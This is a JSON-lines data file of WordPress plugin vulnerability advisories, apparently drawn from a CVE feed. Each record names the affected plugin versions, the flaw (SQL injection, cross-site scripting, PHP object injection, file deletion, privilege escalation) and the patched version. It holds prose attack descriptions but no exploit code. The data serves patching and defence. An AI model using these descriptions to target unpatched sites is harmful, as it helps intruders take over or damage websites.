{"CVE_ID":"CVE-2023-32739","slug":"wp-custom-cursors","versionEndExcluding":"3.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in Web_Trendy WP Custom Cursors | WordPress Cursor Plugin plugin <\u00a03.2 versions.","recommendation":"Update to version 3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-custom-cursors\\\/wordpress-wp-custom-cursors-plugin-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-custom-cursors\\\/wordpress-wp-custom-cursors-plugin-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2221","slug":"wp-custom-cursors","versionEndExcluding":"3.2","description":"The WP Custom Cursors WordPress plugin before 3.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6666688e-7239-4d40-a348-307cf8f3b657\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6666688e-7239-4d40-a348-307cf8f3b657\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7385","slug":"wp-simple-html-sitemap","versionImpact":"3.1","versionEndExcluding":"3.2","description":"The WordPress Simple HTML Sitemap plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f529b981-623f-4bd3-9155-ebfab4c65d1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f529b981-623f-4bd3-9155-ebfab4c65d1d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-html-sitemap\\\/tags\\\/3.1\\\/inc\\\/wshs_saved.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-html-sitemap\\\/tags\\\/3.1\\\/inc\\\/wshs_saved.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155037\\\/wp-simple-html-sitemap\\\/trunk\\\/inc\\\/wshs_saved.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155037\\\/wp-simple-html-sitemap\\\/trunk\\\/inc\\\/wshs_saved.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6884","slug":"widget-google-reviews","versionImpact":"3.1","versionEndExcluding":"3.2","description":"This plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on the 'place_id' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8971d54-b54e-4e62-9db2-fa87d2564599?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8971d54-b54e-4e62-9db2-fa87d2564599?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/widget-google-reviews\\\/tags\\\/3.1\\\/includes\\\/class-feed-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/widget-google-reviews\\\/tags\\\/3.1\\\/includes\\\/class-feed-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3018964%40widget-google-reviews&new=3018964%40widget-google-reviews&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3018964%40widget-google-reviews&new=3018964%40widget-google-reviews&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2023-6884\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2023-6884\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3729","slug":"acf-frontend-form-element","versionImpact":"3.19.4","versionEndExcluding":"3.19.5","description":"The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to improper missing encryption exception handling on the 'fea_encrypt' function in all versions up to, and including, 3.19.4. This makes it possible for unauthenticated attackers to manipulate the user processing forms, which can be used to add and edit administrator users for privilege escalation, or to automatically log in users for authentication bypass, or manipulate the post processing form that can be used to inject arbitrary web scripts. This can only be exploited if the 'openssl' php extension is not loaded on the server.","recommendation":"Update to version 3.19.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2d22c5d-5ef5-4920-a1b5-e8284394c7e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2d22c5d-5ef5-4920-a1b5-e8284394c7e8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-frontend-form-element\\\/tags\\\/3.18.15\\\/main\\\/helpers.php#L617\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-frontend-form-element\\\/tags\\\/3.18.15\\\/main\\\/helpers.php#L617\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073379\\\/acf-frontend-form-element#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073379\\\/acf-frontend-form-element#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12877","slug":"give","versionImpact":"3.19.2","versionEndExcluding":"3.19.3","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.19.2 via deserialization of untrusted input from the donation form like 'firstName'. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files on the server that makes remote code execution possible. Please note this was only partially patched in 3.19.3, a fully sufficient patch was not released until 3.19.4. However, another CVE was assigned by another CNA for version 3.19.3 so we will leave this as affecting 3.19.2 and before. We have recommended the vendor use JSON encoding to prevent any further deserialization vulnerabilities from being present.","recommendation":"Update to version 3.19.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212723\\\/give\\\/tags\\\/3.19.3\\\/src\\\/Helpers\\\/Utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212723\\\/give\\\/tags\\\/3.19.3\\\/src\\\/Helpers\\\/Utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2143edf-5423-4e79-8638-a5b98490d292?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2143edf-5423-4e79-8638-a5b98490d292?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5255","slug":"Ultimate_VC_Addons","versionImpact":"3.19.20","versionEndExcluding":"3.19.20.1","description":"The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ultimate_dual_color shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.19.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66d77518-a258-4e79-b483-275855c0a416?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66d77518-a258-4e79-b483-275855c0a416?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"name\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5254","slug":"Ultimate_VC_Addons","versionImpact":"3.19.20","versionEndExcluding":"3.19.20.1","description":"The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ultimate_info_banner shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.19.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c8971e0-befd-47ac-8cb5-064f9cd757d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c8971e0-befd-47ac-8cb5-064f9cd757d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"name\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5253","slug":"Ultimate_VC_Addons","versionImpact":"3.19.20","versionEndExcluding":"3.19.20.1","description":"The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ult_team shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.19.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97666e54-8e86-4f18-ae32-ad8ca607aeff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97666e54-8e86-4f18-ae32-ad8ca607aeff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"name\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5252","slug":"Ultimate_VC_Addons","versionImpact":"3.19.20","versionEndExcluding":"3.19.20.1","description":"The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ultimate_info_table shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.19.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/675937dc-a032-4bc4-a449-c815fcb12db6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/675937dc-a032-4bc4-a449-c815fcb12db6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"name\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5251","slug":"Ultimate_VC_Addons","versionImpact":"3.19.20","versionEndExcluding":"3.19.20.1","description":"The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ultimate_pricing shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.19.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e637044d-9b49-4de5-b8b8-d48a0e5e1afc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e637044d-9b49-4de5-b8b8-d48a0e5e1afc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"name\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11921","slug":"give","versionImpact":"3.18.0","versionEndExcluding":"3.19.0","description":"The GiveWP WordPress plugin before 3.19.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 3.19.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f196294-5ba9-45b6-a27c-ab1702cc001f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f196294-5ba9-45b6-a27c-ab1702cc001f\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f196294-5ba9-45b6-a27c-ab1702cc001f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f196294-5ba9-45b6-a27c-ab1702cc001f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4564","slug":"wp-ticketbai","versionImpact":"3.18","versionEndExcluding":"3.19","description":"The TicketBAI Facturas para WooCommerce plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation via the 'delpdf' action in all versions up to, and including, 3.18. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 3.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ticketbai\\\/trunk\\\/wp-ticketbai.php#L240\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ticketbai\\\/trunk\\\/wp-ticketbai.php#L240\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292061\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292061\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2927aa13-b012-41eb-93bd-38a4e5fc5455?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2927aa13-b012-41eb-93bd-38a4e5fc5455?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5544","slug":"media-library-assistant","versionImpact":"3.17","versionEndExcluding":"3.18","description":"The Media Library Assistant plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the order parameter in all versions up to, and including, 3.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0c34d3-5c7d-43a5-9430-2ebdc155123f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0c34d3-5c7d-43a5-9430-2ebdc155123f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110092\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110092\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13643","slug":"zox-news","versionImpact":"3.17.0","versionEndExcluding":"3.17.1","description":"The Zox News - Professional WordPress News & Magazine Theme plugin for WordPress is vulnerable to unauthorized data modification. This vulnerability can lead to privilege escalation and denial of service conditions due to missing capability checks on the backup_options() and reset_options() functions in all versions up to and including 3.17.0. This vulnerability allows authenticated attackers with Subscriber-level access and above to update and delete arbitrary option values on the WordPress site. Attackers can exploit this issue to update the default user role for registration to Administrator and enable user registration, thereby gaining administrative access to the vulnerable site. Additionally, they could delete critical options, causing errors that may disrupt the site's functionality and deny service to legitimate users.","recommendation":"Update to version 3.17.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/mvpthemes.com\\\/zoxnews\\\/\",\"name\":\"https:\\\/\\\/mvpthemes.com\\\/zoxnews\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/zox-news-professional-wordpress-news-magazine-theme\\\/20381541\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/zox-news-professional-wordpress-news-magazine-theme\\\/20381541\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4adb7436-11e6-4512-b6c9-551402909bf0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4adb7436-11e6-4512-b6c9-551402909bf0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12043","slug":"bdthemes-prime-slider-lite","versionImpact":"3.16.5","versionEndExcluding":"3.16.6","description":"The Prime Slider \u2013 Addons For Elementor (Revolution of a slider, Hero Slider, Post Slider and Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'social_link_title' parameter of the 'blog' widget in all versions up to, and including, 3.16.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.16.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222179%40bdthemes-prime-slider-lite&new=3222179%40bdthemes-prime-slider-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222179%40bdthemes-prime-slider-lite&new=3222179%40bdthemes-prime-slider-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23e1fffa-9170-4bc2-ad7e-27708a08033b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23e1fffa-9170-4bc2-ad7e-27708a08033b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3352","slug":"wp-smushit","versionImpact":"3.16.4","versionEndExcluding":"3.16.5","description":"The Smush plugin for WordPress is vulnerable to unauthorized deletion of the resmush list due to a missing capability check on the delete_resmush_list() function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to delete the resmush list for Nextgen or the Media Library.","recommendation":"Update to version 3.16.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfbaa3e4-40c2-41d8-996c-232e27a04b73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfbaa3e4-40c2-41d8-996c-232e27a04b73?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105107\\\/wp-smushit\\\/trunk\\\/app\\\/class-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105107\\\/wp-smushit\\\/trunk\\\/app\\\/class-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9634","slug":"give","versionImpact":"3.16.3","versionEndExcluding":"3.16.4","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.3 via deserialization of untrusted input from the give_company_name parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to achieve remote code execution.","recommendation":"Update to version 3.16.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8eb3aa9-fe60-48b6-aa24-7873dd68b47e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8eb3aa9-fe60-48b6-aa24-7873dd68b47e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.16.2\\\/src\\\/Donations\\\/Repositories\\\/DonationRepository.php?rev=3157829\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.16.2\\\/src\\\/Donations\\\/Repositories\\\/DonationRepository.php?rev=3157829\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166836\\\/give\\\/tags\\\/3.16.4\\\/includes\\\/process-donation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166836\\\/give\\\/tags\\\/3.16.4\\\/includes\\\/process-donation.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1279","slug":"bm-builder","versionImpact":"3.16.2.1","versionEndExcluding":"3.16.3","description":"The BM Content Builder plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the ux_cb_tools_import_item_ajax AJAX action in all versions up to, and including, 3.16.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 3.16.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/art-simple-clean-wordpress-theme-for-creatives\\\/20170299\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/art-simple-clean-wordpress-theme-for-creatives\\\/20170299\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4632899-c3bf-48f3-8a69-8fa32bfd902d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4632899-c3bf-48f3-8a69-8fa32bfd902d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1777","slug":"bm-builder","versionImpact":"3.16.2.1","versionEndExcluding":"3.16.3","description":"The BM Content Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ux_cb_page_options_save' function in all versions up to, and including, 3.16.2.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.16.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.seatheme.net\\\/\",\"name\":\"https:\\\/\\\/www.seatheme.net\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb3e0251-c3b7-4360-87f3-7e4612d4f285?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb3e0251-c3b7-4360-87f3-7e4612d4f285?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8353","slug":"give","versionImpact":"3.16.1","versionEndExcluding":"3.16.2","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1 via deserialization of untrusted input via several parameters like 'give_title' and 'card_address'. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files and achieve remote code execution. This is essentially the same vulnerability as CVE-2024-5932, however, it was discovered that the presence of stripslashes_deep on user_info allows the is_serialized check to be bypassed. This issue was mostly patched in 3.16.1, but further hardening was added in 3.16.2.","recommendation":"Update to version 3.16.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4c530fa-eaf4-4721-bfb6-9fc06d7f343c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4c530fa-eaf4-4721-bfb6-9fc06d7f343c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.16.0\\\/includes\\\/process-donation.php#L154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.16.0\\\/includes\\\/process-donation.php#L154\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149290\\\/give\\\/tags\\\/3.16.1\\\/includes\\\/process-donation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149290\\\/give\\\/tags\\\/3.16.1\\\/includes\\\/process-donation.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149290\\\/give\\\/tags\\\/3.16.1\\\/includes\\\/admin\\\/admin-actions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149290\\\/give\\\/tags\\\/3.16.1\\\/includes\\\/admin\\\/admin-actions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149290\\\/give\\\/tags\\\/3.16.1\\\/src\\\/Helpers\\\/Utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149290\\\/give\\\/tags\\\/3.16.1\\\/src\\\/Helpers\\\/Utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157829\\\/give\\\/tags\\\/3.16.2\\\/includes\\\/process-donation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157829\\\/give\\\/tags\\\/3.16.2\\\/includes\\\/process-donation.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6551","slug":"give","versionImpact":"3.15.1","versionEndExcluding":"3.16.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.15.1. This is due to the plugin utilizing Symfony and leaving display_errors on within test files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.16.0, or a newer patched 